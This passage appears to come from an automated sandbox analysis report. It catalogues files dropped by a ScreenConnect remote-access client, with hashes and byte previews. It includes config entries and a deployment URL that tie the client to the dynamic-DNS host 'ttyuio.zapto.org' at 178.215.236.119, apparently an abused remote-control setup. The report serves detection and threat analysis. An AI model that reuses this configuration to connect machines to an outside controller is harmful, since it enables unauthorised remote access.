                                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.resources

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\app.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1970
                                                                                                                                                                                                                                                                        Entropy (8bit):4.690426481732819
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                                                                                                                                        MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                                                                                                                                        SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                                                                                                                                        SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                                                                                                                                        SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\fr4vgpeb.newcfg

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):563
                                                                                                                                                                                                                                                                        Entropy (8bit):5.038578038992003
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvhgQv/vXbAa3xT:2dL9hK6E46YPFV3vH
                                                                                                                                                                                                                                                                        MD5:798B6C387EFBFB8E358A934AAE04099A
                                                                                                                                                                                                                                                                        SHA1:041EFFE7ADEF3CA3CC117D657A255E7A468989B5
                                                                                                                                                                                                                                                                        SHA-256:721B738D47F154D32EF1284A2BA9ACCC68F49A83EC93A69FE488477EBF69027F
                                                                                                                                                                                                                                                                        SHA-512:E6369861086EFD343213C4BDD596AA76F53D8E55B9E513D1D2BE60DE25A2E9A77530A6ED6E1AE1C0163E1738D07FFEEA58A24DD7B2EA45E068EE0A685F75B86F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a23%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\user.config (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):563
                                                                                                                                                                                                                                                                        Entropy (8bit):5.038578038992003
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvhgQv/vXbAa3xT:2dL9hK6E46YPFV3vH
                                                                                                                                                                                                                                                                        MD5:798B6C387EFBFB8E358A934AAE04099A
                                                                                                                                                                                                                                                                        SHA1:041EFFE7ADEF3CA3CC117D657A255E7A468989B5
                                                                                                                                                                                                                                                                        SHA-256:721B738D47F154D32EF1284A2BA9ACCC68F49A83EC93A69FE488477EBF69027F
                                                                                                                                                                                                                                                                        SHA-512:E6369861086EFD343213C4BDD596AA76F53D8E55B9E513D1D2BE60DE25A2E9A77530A6ED6E1AE1C0163E1738D07FFEEA58A24DD7B2EA45E068EE0A685F75B86F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a23%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                                        Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                        MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                        SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                        SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                        SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\CHT0VHXS.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (623), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):15016
                                                                                                                                                                                                                                                                        Entropy (8bit):3.807193374964683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:CjVqHzgjvUakjVqHzQbWyOIYIRjVqHzzIZx8jdLEv:YcCvUxc8bWyO3icvksdA
                                                                                                                                                                                                                                                                        MD5:1A13F6BBE1AFF7C669FC746D3633042D
                                                                                                                                                                                                                                                                        SHA1:5BBACA18C7BAD5E7AC5EC382A9A88FE836CF8DDD
                                                                                                                                                                                                                                                                        SHA-256:6831B4FD149564B4731C5523A061AADA34A02B15ED925D85C43DB6EA3926A95C
                                                                                                                                                                                                                                                                        SHA-512:55BB71D0B4392ED99B4CACC6CF890D13A7FA9E4A515D570470FD351AC73684D10F812DC8EAD40FCFAE1B3C40F94F3D1A7527BC1F9520D1D2DD8BF39F93367892
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.l.o.u.d.f.i.l.e.s.-.s.e.c.u.r.e...i.o./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.t.t.y.u.i.o...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.7.3.5.4.9.b.6.7.-.7.2.6.b.-.4.7.0.e.-.a.b.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\VTYYR3JN.ED2\5RJOO8WG.EGV.application

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):242016
                                                                                                                                                                                                                                                                        Entropy (8bit):5.858471214140723
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
                                                                                                                                                                                                                                                                        MD5:D8259314C0A0D0B11E4979470E4B973A
                                                                                                                                                                                                                                                                        SHA1:552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
                                                                                                                                                                                                                                                                        SHA-256:B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
                                                                                                                                                                                                                                                                        SHA-512:47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                                        Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                        MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                        SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                        SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                                        SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll.genman

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                        Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                        Encrypted:false
